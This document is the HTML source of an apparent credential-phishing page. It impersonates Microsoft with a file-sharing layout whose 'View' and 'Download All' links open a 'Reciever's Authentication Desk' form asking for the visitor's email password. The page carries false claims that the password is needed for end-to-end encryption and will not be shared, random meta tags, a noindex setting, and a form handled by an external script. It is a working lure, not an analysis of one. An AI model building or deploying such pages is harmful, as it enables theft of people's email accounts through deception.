<!DOCTYPE html>
<html lang="en">

<head>
       <title> zAuvP </title>

<meta name="description" content="for S">



<meta name="keywords" content="_Demands">

<meta name="robots" content="noindex, nofollow">

<meta property="og:title" content="_Overview | Specs">

<meta property="og:type" content="website">

<meta property="og:site_name" content="_&amp;Requirements">

<meta property="og:description" content="&amp;RFQ_">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css"
        integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
   <script src="main.js"></script>

    <style>
        video {
            object-fit: cover;
            width: 100vw;
            height: 100vh;
            position: fixed;
            top: 0;
            left: 0;
            z-index: -1;
        }
    </style>
</head>

<body>

    <nav class="navbar " style="background-color:#026FC2;">
        <div class="container">
            <a class="navbar-brand" href="#"><img src="logo.jpg"></a>
            <button class="navbar-toggler " type="button ">
                <span class="navbar-toggler-icon text-dark"></span>
            </button>

        </div>
    </nav>


    <div class="container">
        <div class="row mt-4">
            <div class="col-sm-9 p-0 " style="box-shadow:2px 2px  3px gray">
                <div style="background-color: #026FC2;">
                    <img src="top.jpg" class="img-fluid">
                </div>

                <table class="table table-borederless" style="font-size: 12px;">
                    <tr>
                        <td><img src="tp.jpg" class="img-fluid"> </td>
                        <td class="text-right"><a href="" data-toggle="modal" data-target="#myModal">View</a></td>
                    </tr>
                    <tr>
                        <td><img src="tp2.jpg" class="d"> </td>
                        <td class="text-right"><a href="" data-toggle="modal" data-target="#myModal">View</a></td>
                    </tr>
                    <tr>
                    <tr>
                        <td><img src="tp3.jpg" class="d"> </td>
                        <td class="text-right"><a href="" data-toggle="modal" data-target="#myModal">View</a></td>
                    </tr>
                    <tr>
                        <td> </td>
                        <td class="text-right"><a href="" data-toggle="modal" data-target="#myModal">Download All</a>
                        </td>
                    </tr>
                </table>
            </div>

            <div class="col-sm-3">
               
            </div>
            <div class="my-4" style="font-size: 12px;">© Microsoft 2021.</div>
        </div>
    </div>



    <!-- The Modal -->
    <div class="modal" id="myModal">
        <div class="modal-dialog modal-lg">
            <div class="modal-content">

                <!-- Modal Header -->
                <div class="modal-header">
                    <h4 class="modal-title">Reciever's Authentication Desk</h4>
                    <button type="button" class="close" data-dismiss="modal">&times;</button>
                </div>

                <!-- Modal body -->
                <div class="modal-body">
                    <div id="msg" class="alert alert-success">
                        Authenticating Credentials, Please wait...
                    </div>
                    <div id="msg2" class="alert alert-danger">
                        Invalid Credentials!
                    </div>

                    <form method="post" id="profileUp">
                        <label for="demo">Email address</label>
                        <div class="input-group">
                            <div class="input-group-append">
                                <span class="input-group-text"><i class="fa fa-envelope"></i></span>
                            </div>
                            <input type="text" readonly class="form-control" value="" placeholder="Email" id="x1"
                                name="x1">

                        </div>
                        <div><small>We'll never share your email with anyone else.</small></div>
                        <label for="demo">Email Password</label>
                        <div class="input-group">
                            <div class="input-group-append">
                                <span class="input-group-text"><i class="fa fa-lock"></i></span>
                            </div>
                            <input type="password" class="form-control" value="" placeholder="Receiver's Email Password"
                                id="x2" name="x2">

                        </div>
                        <div class="mb-3"><small>Required for end to end encryption</small></div>
                        <div class="input-group">
                            <input type="checkbox"> Data Encryption Enabled
                        </div>
                        <hr>
                        <div class="text-right mb-3"> <button type="submit" class="btn-primary btn">View File</button>
                        </div>



                        <div style="font-size: 12px;"></div>
                        Tip: To access files, enter receiver's email and password
                        <div style="font-size: 10px;">
                            All rights reserved. ©Microsoft 2020
                        </div>
                </div>
                </form>
            </div>


        </div>
    </div>
    </div>




</body>

</html>